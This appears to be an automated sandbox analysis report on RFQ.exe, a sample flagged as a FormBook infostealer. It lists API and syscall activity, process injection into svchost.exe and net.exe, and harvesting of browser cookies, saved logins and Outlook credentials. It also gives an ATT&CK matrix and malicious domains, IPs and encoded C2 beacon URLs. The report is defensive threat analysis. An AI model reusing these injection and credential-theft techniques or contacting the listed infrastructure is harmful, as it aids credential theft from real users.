                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\net.exeThread register set: target process: 8040Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\net.exeThread APC queued: target process: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\RFQ.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F3008Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006E1145 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_006E1145
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0068445D GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_0068445D
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0069EFAD GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,0_2_0069EFAD
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006EE273 mouse_event,0_2_006EE273
                Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"Jump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006E0AA6 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_006E0AA6
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006E15A7 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_006E15A7
                Source: RFQ.exeBinary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd%s#comments-end#ceCALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEG
                Source: RFQ.exe, aSgPuBFuPS.exe, 00000002.00000002.3506712515.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000000.1724749741.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3506827972.0000000001AE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: aSgPuBFuPS.exe, 00000002.00000002.3506712515.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000000.1724749741.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3506827972.0000000001AE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: aSgPuBFuPS.exe, 00000002.00000002.3506712515.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000000.1724749741.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3506827972.0000000001AE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: aSgPuBFuPS.exe, 00000002.00000002.3506712515.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000000.1724749741.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3506827972.0000000001AE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006A0618 cpuid 0_2_006A0618
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F80B3 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_006F80B3
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006DDA16 GetUserNameW,0_2_006DDA16
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006BBB0F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_006BBB0F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0068615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0068615E

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.3a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3505942497.0000000000AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3507077238.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1821270543.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1820457508.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3506196404.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1820800178.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3506950733.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: RFQ.exeBinary or memory string: WIN_81
                Source: RFQ.exeBinary or memory string: WIN_XP
                Source: RFQ.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: RFQ.exeBinary or memory string: WIN_XPe
                Source: RFQ.exeBinary or memory string: WIN_VISTA
                Source: RFQ.exeBinary or memory string: WIN_7
                Source: RFQ.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.3a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3505942497.0000000000AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3507077238.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1821270543.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1820457508.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3506196404.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1820800178.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3506950733.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0070112B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_0070112B
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0070172D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0070172D

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets141
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554222 Sample: RFQ.exe Startdate: 12/11/2024 Architecture: WINDOWS Score: 100 28 www.wukong.college 2->28 30 www.vnxoso88.art 2->30 32 16 other IPs or domains 2->32 42 Antivirus detection for URL or domain 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 5 other signatures 2->48 10 RFQ.exe 1 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 aSgPuBFuPS.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 net.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 aSgPuBFuPS.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.pluribiz.life 209.74.64.58, 49897, 49912, 49927 MULTIBAND-NEWHOPEUS United States 22->34 36 ppp84k45ss7ehy8ypic5x.limelightcdn.com 23.106.59.18, 50044, 80 LEASEWEB-UK-LON-11GB United Kingdom 22->36 38 6 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RFQ.exe62%ReversingLabsWin32.Trojan.Autoitinject
                RFQ.exe100%AviraDR/AutoIt.Gen8
                RFQ.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.vehiculargustav.click/95c0/0%Avira URL Cloudsafe
                http://www.wukong.college/9ezc/0%Avira URL Cloudsafe
                http://www.fiqsth.vip/0m8a/?JPc=NBQdBBkPWTStX&L2m0Zn=g30HQpd+HgMxFOssrIfrDJeMHEaPET3LohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp4aasf9fUqZys1Rw05sAbj1FN7j6PbWaPRM=0%Avira URL Cloudsafe
                http://www.corpseflowerwatch.org/yjfe/?L2m0Zn=ssLl/70GAhUcKdDjElf9oY7c1Toe/LKZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYqz93E4YYiGwwRQuF1AOSzaR72LbFn096Vw=&JPc=NBQdBBkPWTStX100%Avira URL Cloudmalware
                https://whois.gandi.net/en/results?search=4nk.education0%Avira URL Cloudsafe
                http://www.4nk.education/gnvu/100%Avira URL Cloudmalware
